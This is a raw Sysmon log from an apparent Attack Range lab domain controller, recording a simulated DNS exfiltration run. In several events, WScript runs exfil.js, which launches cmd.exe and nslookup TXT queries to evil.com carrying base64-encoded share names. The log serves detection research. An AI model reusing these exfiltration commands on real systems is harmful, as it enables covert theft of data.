14:21:24.618{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.602{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.602{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.602{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.602{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9642-000000005F02}4004C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.602{2E1864BB-18E4-629A-9442-000000005F02}80322556C:\Windows\system32\cmd.exe{2E1864BB-18E4-629A-9642-000000005F02}4004C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.616{2E1864BB-18E4-629A-9642-000000005F02}4004C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E4-629A-9442-000000005F02}8032C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfhsw.tmp 2>&1 10341000x8000000000000000206362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.548{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-9542-000000005F02}7156C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.548{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-9542-000000005F02}7156C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.548{2E1864BB-18E4-629A-9542-000000005F02}71565748C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-9442-000000005F02}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000206359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.517{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D39A7C68625BF0FD532E935C11BE50F,SHA256=D82E7502D46BBC0F74F4787EAD05CE7983A8E36D66F0FC3FD0D6AEA83FDCD8AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.517{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9542-000000005F02}7156C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.501{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9442-000000005F02}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.501{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.501{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.501{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.501{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.501{2E1864BB-18E0-629A-6742-000000005F02}39764740C:\Windows\System32\WScript.exe{2E1864BB-18E4-629A-9442-000000005F02}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.511{2E1864BB-18E4-629A-9442-000000005F02}8032C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfhsw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.501{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxgck.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000206349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.501{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D333F68A6E5889C075BB871F01CDE877,SHA256=93B245FEA8E9BE26055F179ECD7B1EB084A0275CC08C46FD3E8B37241AF9FF62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.485{2E1864BB-18E4-629A-9242-000000005F02}9846024C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-9342-000000005F02}6604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.470{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.470{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.470{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.470{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9342-000000005F02}6604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.470{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.470{2E1864BB-18E4-629A-9142-000000005F02}24047364C:\Windows\system32\cmd.exe{2E1864BB-18E4-629A-9342-000000005F02}6604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.482{2E1864BB-18E4-629A-9342-000000005F02}6604C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E4-629A-9142-000000005F02}2404C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxgck.tmp 2>&1 10341000x8000000000000000206340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.468{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-9242-000000005F02}984C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.468{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-9242-000000005F02}984C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.464{2E1864BB-18E4-629A-9242-000000005F02}9846024C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-9142-000000005F02}2404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.448{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9242-000000005F02}984C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 